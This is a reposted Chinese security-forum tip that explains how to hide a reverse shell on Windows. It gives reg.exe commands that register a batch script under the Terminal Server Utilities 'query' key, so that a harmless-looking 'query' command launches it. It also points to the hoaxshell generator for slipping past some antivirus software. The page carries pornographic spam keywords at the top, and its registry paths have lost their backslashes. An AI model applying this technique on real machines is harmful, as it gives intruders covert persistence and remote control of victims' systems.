一区二区三区三上|欧美在线视频五区|国产午夜无码在线观看视频|亚洲国产裸体网站|无码成年人影视|亚洲AV亚洲AV|成人开心激情五月|欧美性爱内射视频|超碰人人干人人上|一区二区无码三区亚洲人区久久精品

搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統(tǒng)消息
      • 評(píng)論與回復(fù)
      VIP于 到期 續(xù)費(fèi)
      登錄后你可以
      • 下載海量資料
      • 學(xué)習(xí)在線課程
      • 觀看技術(shù)視頻
      • 寫文章/發(fā)帖/加入社區(qū)
      會(huì)員中心
      創(chuàng)作中心
      發(fā)布
      創(chuàng)作活動(dòng)

      完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

      3天內(nèi)不再提示

      用一條命令來(lái)隱藏反向Shell

      jf_Fo0qk3ln ? 來(lái)源:關(guān)注安全技術(shù) ? 2023-07-05 09:32 ? 次閱讀
      加入交流群
      微信小助手二維碼

      掃碼添加小助手

      加入工程師交流群

      From:https://www.youtube.com/watch?v=gzv3d7rvjKA

      注冊(cè)表路徑:

      HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery

      包含了與終端服務(wù)器相關(guān)的設(shè)置和配置信息。

      執(zhí)行命令query可以查看服務(wù)器的一些狀態(tài),實(shí)際上是執(zhí)行此項(xiàng)值中的可執(zhí)行文件。

      c58e25e2-1acb-11ee-962d-dac502259ad0.png

      c5acff1c-1acb-11ee-962d-dac502259ad0.png

      添加一條,打開計(jì)算器。

      reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe

      c5cc27fc-1acb-11ee-962d-dac502259ad0.png

      這里再介紹一個(gè)能夠繞過(guò)一些AV的Windows反向shell生成器和交互程序。(測(cè)試環(huán)境用的X絨,可以繞過(guò),經(jīng)測(cè)試不能繞過(guò)Windows Defender的AMSI)。

      https://github.com/t3l3machus/hoaxshell

      c5eedc98-1acb-11ee-962d-dac502259ad0.png

      將命令寫入一個(gè)bat腳本中,然后添加注冊(cè)表后執(zhí)行。

      c6327a48-1acb-11ee-962d-dac502259ad0.png

      reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec

      只需執(zhí)行命令query heresec即可運(yùn)行反彈shell腳本。

      c659cb66-1acb-11ee-962d-dac502259ad0.png

      還能怎么用,再聯(lián)想一下。

      聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
      • 服務(wù)器
        +關(guān)注

        關(guān)注

        13

        文章

        9797

        瀏覽量

        88043
      • Shell
        +關(guān)注

        關(guān)注

        1

        文章

        372

        瀏覽量

        24232

      原文標(biāo)題:小技巧 | 用一條命令來(lái)隱藏反向Shell

      文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

      收藏 人收藏
      加入交流群
      微信小助手二維碼

      掃碼添加小助手

      加入工程師交流群

        評(píng)論

        相關(guān)推薦
        熱點(diǎn)推薦

        Linux實(shí)現(xiàn)簡(jiǎn)易的Shell命令行解釋器

        來(lái)制作個(gè)簡(jiǎn)易的 [Shell 命令]行解釋器。
        的頭像 發(fā)表于 03-30 10:00 ?2131次閱讀

        基于Go語(yǔ)言的反彈Shell命令生成工具簡(jiǎn)介

        RevShell 是個(gè)基于Go語(yǔ)言的反彈Shell命令生成工具,旨在幫助安全研究人員和滲透測(cè)試人員在需要與目標(biāo)主機(jī)建立反向連接時(shí)快速生成相應(yīng)的Sh
        發(fā)表于 08-25 09:45 ?1007次閱讀
        基于Go語(yǔ)言的反彈<b class='flag-5'>Shell</b><b class='flag-5'>命令</b>生成工具簡(jiǎn)介

        Linux Shell系列教程之Shell簡(jiǎn)介和類型

        (Interactive):解釋執(zhí)行用戶的命令,用戶輸入一條命令,Shell就解釋執(zhí)行一條。批處理(Batch):用戶事先寫
        發(fā)表于 08-28 13:56

        linux shell命令/unix shell命令教程

        linux shell命令/unix shell命令教程:為了防止未授權(quán)用戶訪問(wèn)你的文件,可以在文件和目錄上設(shè)置權(quán)限位。還可以設(shè)定文件在創(chuàng)建時(shí)所具有的缺省權(quán)限:這些只是整個(gè)系統(tǒng)安全問(wèn)題
        發(fā)表于 12-06 13:08 ?61次下載
        linux <b class='flag-5'>shell</b><b class='flag-5'>命令</b>/unix <b class='flag-5'>shell</b><b class='flag-5'>命令</b>教程

        Shell內(nèi)建命令:exit命令

        1.簡(jiǎn)介 exit 命令Shell 內(nèi)建命令,用于退出當(dāng)前 Shell 進(jìn)程。 2.命令格式 exit ?N (1)狀態(tài)碼 N 的范圍是
        的頭像 發(fā)表于 02-02 10:45 ?4315次閱讀

        Shell命令編程實(shí)踐指南

        ??我們?cè)诘?b class='flag-5'>一次作為運(yùn)維人員去學(xué)習(xí)和寫shell腳本的時(shí)候,我們經(jīng)常會(huì)做什么,我們把我們?cè)?? Linux上面去執(zhí)行的那些命令,我們股腦的全部把它丟到
        的頭像 發(fā)表于 08-19 13:10 ?1482次閱讀
        <b class='flag-5'>Shell</b><b class='flag-5'>命令</b>編程實(shí)踐指南

        Shell命令行解釋器簡(jiǎn)介

        Shell個(gè)命令行解釋器,Shell 為用戶提供了與設(shè)備進(jìn)行命令行交互的方式,用戶通過(guò)串口、以太網(wǎng)、無(wú)線等方式將
        的頭像 發(fā)表于 08-19 17:20 ?3579次閱讀

        shell腳本本身自帶的命令詳解

        除了以文件形式保存在/usr/bin下面的命令,shell腳本中還可以使用shell本身自帶的命令,即內(nèi)置命令
        的頭像 發(fā)表于 05-23 09:32 ?1488次閱讀
        <b class='flag-5'>shell</b>腳本本身自帶的<b class='flag-5'>命令</b>詳解

        Kiuwan:如何防止反向Shell攻擊

        員工收到封電子郵件,其中包含附件或鏈接。然后他們單擊附件或鏈接并立即將些惡意軟件下載到他們的計(jì)算機(jī)上。這就是攻擊者獲得反向 shell 連接的方式。然后攻擊者可以在機(jī)器上執(zhí)行
        的頭像 發(fā)表于 07-09 10:57 ?1319次閱讀

        shell腳本基本命令

        Shell腳本是種可執(zhí)行文件,它包含了某種特定語(yǔ)言編寫的命令,這些命令可以被解釋器(如b
        的頭像 發(fā)表于 11-08 10:08 ?2806次閱讀

        shell命令和linux命令樣嗎

        Shell命令和Linux命令并不完全樣。 首先,Shell
        的頭像 發(fā)表于 11-08 10:51 ?3480次閱讀

        linux命令shell編程有什么聯(lián)系

        Linux命令Shell編程之間存在密切的聯(lián)系。 首先,Shell是Linux命令行下的解釋器,它提供了個(gè)用戶界面,使用戶能夠與Linu
        的頭像 發(fā)表于 11-08 10:53 ?1201次閱讀

        linux命令行與shell編程實(shí)戰(zhàn)

        Linux命令行與Shell編程實(shí)戰(zhàn)主要涉及以下內(nèi)容: Linux命令行基礎(chǔ):學(xué)習(xí)Linux命令行的基本操作,如文件管理、進(jìn)程管理、網(wǎng)絡(luò)配置等。熟悉使用
        的頭像 發(fā)表于 11-08 10:57 ?1099次閱讀

        python shell怎么

        Python Shell的使用方法、功能和些常見的操作技巧。 Python Shell的啟動(dòng): Python Shell可以通過(guò)在命令行中
        的頭像 發(fā)表于 11-29 14:36 ?1785次閱讀

        shell具有的功能和特點(diǎn)

        Shell個(gè)命令行解釋器,用于與操作系統(tǒng)進(jìn)行交互。它提供了種方便的方式來(lái)執(zhí)行命令、管理文
        的頭像 發(fā)表于 08-30 14:48 ?1344次閱讀